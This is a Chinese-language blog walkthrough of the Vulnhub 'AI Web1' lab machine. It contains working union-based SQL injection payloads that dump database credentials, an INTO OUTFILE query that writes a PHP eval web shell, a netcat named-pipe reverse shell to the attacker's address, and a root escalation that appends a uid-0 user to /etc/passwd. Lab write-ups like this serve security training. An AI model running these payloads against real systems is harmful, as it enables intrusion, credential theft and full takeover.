0
点赞
收藏
分享

微信扫一扫

Vulnhub靶机:AI Web1

像小强一样活着 2022-01-20 阅读 58

1.信息收集

使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。
![image.png](https://img-blog.csdnimg.cn/img_convert/3c3a865fe295dfe4ffa7cdd375d5ff57.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=438&id=u4fec9964&margin=[object Object]&name=image.png&originHeight=466&originWidth=647&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151029&status=done&style=none&taskId=u13d251ea-cf2b-4b6b-b9e3-289896638f6&title=&width=607.4883117675781)
使用nmap对把目标机进行端口扫描,发现只开启了80端口。
![image.png](https://img-blog.csdnimg.cn/img_convert/a363a571acfb7af511d446b38679c7cd.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=535&id=u9c2af8b3&margin=[object Object]&name=image.png&originHeight=566&originWidth=642&originalType=binary&ratio=1&rotation=0&showTitle=false&size=197980&status=done&style=none&taskId=u75e4d41a-78cd-4fc0-91a6-e3a75018955&title=&width=606.9984741210938)
访问80端口,发现页面只有一句话,没什么可利用的信息。
![image.png](https://img-blog.csdnimg.cn/img_convert/49106f05b6809e534638a6f13be64a10.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=260&id=ucabbb72c&margin=[object Object]&name=image.png&originHeight=391&originWidth=911&originalType=binary&ratio=1&rotation=0&showTitle=false&size=44010&status=done&style=none&taskId=ueb2062ee-1a84-45d7-9a53-b157e806046&title=&width=605.48779296875)
使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。
![image.png](https://img-blog.csdnimg.cn/img_convert/139c239fcfd93c364f48eb81000cc63a.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=674&id=u144c8b9c&margin=[object Object]&name=image.png&originHeight=710&originWidth=637&originalType=binary&ratio=1&rotation=0&showTitle=false&size=125252&status=done&style=none&taskId=u751cc6aa-89f7-4eea-87d6-b8a3c45f55e&title=&width=604.4959411621094)

2.漏洞探测与利用

尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。
![image.png](https://img-blog.csdnimg.cn/img_convert/96801f76b8e00b1a25fa8fe4c83d724a.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=249&id=ua3b75d9e&margin=[object Object]&name=image.png&originHeight=309&originWidth=762&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47767&status=done&style=none&taskId=u01739c8e-76e1-4068-aaed-a12207d57b5&title=&width=612.9959411621094)
依次访问这两个目录,提示无权访问。
![image.png](https://img-blog.csdnimg.cn/img_convert/67fc9f8e757af19d1f271107aa7824b3.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=238&id=ud25171f9&margin=[object Object]&name=image.png&originHeight=344&originWidth=885&originalType=binary&ratio=1&rotation=0&showTitle=false&size=57743&status=done&style=none&taskId=u0bf5965e-0944-41fa-b18b-e32dca110d8&title=&width=613.4923706054688)
那么尝试访问/se3reTdir777/目录,出现一个提交框。
![image.png](https://img-blog.csdnimg.cn/img_convert/a82ca82dab050cb47738f01bf1993fd5.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=254&id=u3aa81712&margin=[object Object]&name=image.png&originHeight=331&originWidth=802&originalType=binary&ratio=1&rotation=0&showTitle=false&size=48962&status=done&style=none&taskId=u3b817d09-62b4-4cee-9a37-32277a5c0bc&title=&width=615.9908447265625)
搜集更多信息,扫描这两个目录下是否还有其他目录,结果扫描出m3diNf0目录下有info.php,访问该文件,发现是phpinfo探针,存在信息泄露。
![image.png](https://img-blog.csdnimg.cn/img_convert/f7a5e6dce8d0f6906bd3db8f71586387.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=532&id=uc60a296c&margin=[object Object]&name=image.png&originHeight=839&originWidth=955&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141924&status=done&style=none&taskId=u27802ddf-7fc4-456c-9842-c5154cda8ca&title=&width=605.4898376464844)

2.1 SQL注入

猜测可能存在注入,显示正常,存在注入。
![image.png](https://img-blog.csdnimg.cn/img_convert/4431fc50c19e9baca3f3ee4b057b9ba1.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=553&id=u3b04e1e3&margin=[object Object]&name=image.png&originHeight=625&originWidth=682&originalType=binary&ratio=1&rotation=0&showTitle=false&size=59870&status=done&style=none&taskId=u9be92362-3a1b-4415-865b-5486957ce2f&title=&width=602.993408203125)

  • 判断数据库类型,为MySQL server。

![image.png](https://img-blog.csdnimg.cn/img_convert/6ae061b1d24aae5f9e9ff443576f46b0.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=194&id=u26855b53&margin=[object Object]&name=image.png&originHeight=291&originWidth=909&originalType=binary&ratio=1&rotation=0&showTitle=false&size=56082&status=done&style=none&taskId=u5c1aab1c-a27e-474a-8403-1a3b7255935&title=&width=607.4969482421875)

  • 判断列数,输入1' order by 3 -- -时,显示正确。换成order by 4,显示错误。所以这个数据库当前表的列数为3列。

![image.png](https://img-blog.csdnimg.cn/img_convert/2fdd929b9736f40c5d41c9bc74966d8f.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=226&id=WEyby&margin=[object Object]&name=image.png&originHeight=271&originWidth=726&originalType=binary&ratio=1&rotation=0&showTitle=false&size=39593&status=done&style=none&taskId=u43c6ac26-0b61-42bb-bd2c-d0d0b83ae0d&title=&width=605.9989929199219)

  • 爆破当前数据库名和用户

-1' union select 1,database(),user() -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/24bdfdd33a25278e4784bc1f2ebbfab1.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=432&id=u789ddde8&margin=[object Object]&name=image.png&originHeight=439&originWidth=616&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50231&status=done&style=none&taskId=u0c4963c9-1796-40fa-a687-9ba40460aca&title=&width=605.9903564453125)

  • 爆破当前数据库的表名,可以看到有两个表:user、systemUser。

-1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/9b3f9532cfd17d9ef0dff05ac72d9a74.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=397&id=u1c3202ac&margin=[object Object]&name=image.png&originHeight=509&originWidth=780&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50392&status=done&style=none&taskId=u1e3431ab-05cb-4c83-8f15-6f856c4963e&title=&width=607.9898376464844)

  • 分别爆破user和sysytemUser表的列名。

-1' union select 1,column_name,3 from information_schema.columns where table_name='user' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/8d58f838de8e6319d682a358ae2e3703.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=492&id=u54c69056&margin=[object Object]&name=image.png&originHeight=525&originWidth=652&originalType=binary&ratio=1&rotation=0&showTitle=false&size=35141&status=done&style=none&taskId=udfea8c93-4d28-42b9-8294-fe001dbf94e&title=&width=610.9908447265625)
-1' union select 1,column_name,3 from information_schema.columns where table_name='systemUser' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/826776e1a833bccf1e8b8ba2a4b5fb61.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=562&id=u7c5b62e7&margin=[object Object]&name=image.png&originHeight=540&originWidth=581&originalType=binary&ratio=1&rotation=0&showTitle=false&size=38619&status=done&style=none&taskId=uf8104b4b-cb8e-48a1-aed1-c1910f27543&title=&width=604.4908447265625)

  • 爆破user表列名的内容。

-1' union select id,firstName,lastName from user -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/0d674c10ad6b6dd35abb103695108911.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=588&id=ufe689889&margin=[object Object]&name=image.png&originHeight=522&originWidth=536&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47297&status=done&style=none&taskId=ua61f37e5-295f-4cd2-b588-3b5de39d9e8&title=&width=603.98779296875)
爆破systemUser表的内容。
-1' union select id,userName,password from systemUser -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/3afcd00a0631cb93bbd1c7fe93a50132.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=420&id=u2760b1ff&margin=[object Object]&name=image.png&originHeight=500&originWidth=712&originalType=binary&ratio=1&rotation=0&showTitle=false&size=45325&status=done&style=none&taskId=ubb5b99fa-9a51-4bd7-b8c6-ddc3fafc859&title=&width=597.9959411621094)

2.2 尝试into outfile 写shell

首先需要获知网站的绝对路径,在phpinfo探针中找到网站绝对路径。
![image.png](https://img-blog.csdnimg.cn/img_convert/98bda200d0f730ffd210529eb9c3cfbc.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=539&id=u2334ee92&margin=[object Object]&name=image.png&originHeight=781&originWidth=871&originalType=binary&ratio=1&rotation=0&showTitle=false&size=109613&status=done&style=none&taskId=uc6247173-f418-482d-a649-7fd2e854c58&title=&width=601.4928894042969)
尝试在文件上传目录/se3reTdir777/uploads中写入一句话木马。
-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php" -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/2e803954d07cffc04a8101572de9b28c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=143&id=ua60db2d2&margin=[object Object]&name=image.png&originHeight=230&originWidth=956&originalType=binary&ratio=1&rotation=0&showTitle=false&size=48392&status=done&style=none&taskId=ud439879d-8a74-45cc-b9ae-218c77a4828&title=&width=592.9979553222656)
使用蚁剑成功连接。
![image.png](https://img-blog.csdnimg.cn/img_convert/9833f8ea02dd6c05f96744ff5c9d8b99.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=199&id=u03dc6ddb&margin=[object Object]&name=image.png&originHeight=332&originWidth=1011&originalType=binary&ratio=1&rotation=0&showTitle=false&size=31110&status=done&style=none&taskId=ufb249b05-ac9c-4801-9ca7-6ece9932fd5&title=&width=606.48779296875)

3.反弹shell

  • 在kali开启监听:nv -lvvp 6666
  • 在蚁剑终端上nc反弹:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 6666 >/tmp/f
  • 成功反弹shell。
  • 为了方便,使用命令python -c 'import pty;pty.spawn("/bin/bash")'进入交互式shell。

![image.png](https://img-blog.csdnimg.cn/img_convert/fe36a4fbe0792b6df37ba8530f3a89de.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=116&id=ucd99151c&margin=[object Object]&name=image.png&originHeight=151&originWidth=796&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24703&status=done&style=none&taskId=u9c0b4cae-5148-462e-9c74-48c1d81b70f&title=&width=611.9928894042969)
![image.png](https://img-blog.csdnimg.cn/img_convert/ec84f4a06d7063b5cc04f26d3c8f895c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=242&id=ud7713124&margin=[object Object]&name=image.png&originHeight=288&originWidth=732&originalType=binary&ratio=1&rotation=0&showTitle=false&size=113122&status=done&style=none&taskId=u57f26cde-f06a-4397-a819-1a2485b6cb6&title=&width=613.993408203125)

4.提权

  • 查询/etc/passwd文件属性,发现当前用户拥有读写权限。

![image.png](https://img-blog.csdnimg.cn/img_convert/8b5528fb59f0b620dada5e9869cad088.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=83&id=ueb32a4f6&margin=[object Object]&name=image.png&originHeight=99&originWidth=720&originalType=binary&ratio=1&rotation=0&showTitle=false&size=38135&status=done&style=none&taskId=u52ef534e-b483-4838-8b32-0f42a53faba&title=&width=606.9974670410156)

  • 那么尝试在/etc/passwd文件中添加一个root权限的用户进行提权。
  • 创建一个hack用户,使用openssl工具加密密码:

openssl passwd -1 -salt hack hack
![image.png](https://img-blog.csdnimg.cn/img_convert/ba651766b647ef8022d37950e006fefd.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=108&id=u0ea5a18e&margin=[object Object]&name=image.png&originHeight=112&originWidth=639&originalType=binary&ratio=1&rotation=0&showTitle=false&size=36983&status=done&style=none&taskId=uac282427-5134-4fd9-b6b5-3ccea2d979d&title=&width=615.4989624023438)

  • 整理生成的密码,生成/etc/passwd文件格式的字符串:

hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash

  • 使用命令将生成的字符串添加到/etc/passwd文件中

echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash' >> etc/passwd
![image.png](https://img-blog.csdnimg.cn/img_convert/19ebd0456795fed2e541791eb0651f32.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=88&id=u8d635784&margin=[object Object]&name=image.png&originHeight=103&originWidth=726&originalType=binary&ratio=1&rotation=0&showTitle=false&size=44098&status=done&style=none&taskId=uaf7b40e8-f241-48ab-b367-e496898b3b3&title=&width=620.9954223632812)

  • 登录用户,成功提权到root

![image.png](https://img-blog.csdnimg.cn/img_convert/5d8f8216705b158782d1f01ef1d8266c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=240&id=u4d03dfba&margin=[object Object]&name=image.png&originHeight=283&originWidth=736&originalType=binary&ratio=1&rotation=0&showTitle=false&size=70917&status=done&style=none&taskId=u84167c34-7cd9-477b-a065-f819103053d&title=&width=624.98779296875)

5.总结归纳

  • 多目录扫描发现文件
  • SQL注入
  • 使用into outfile时,需要找到网站绝对路径,并且路径允许写入
  • echo命令写入一句话木马
  • Linux简单提权:修改/etc/passwd文件直接添加root身份的用户提权
  • openssl工具的使用
举报

相关推荐

0 条评论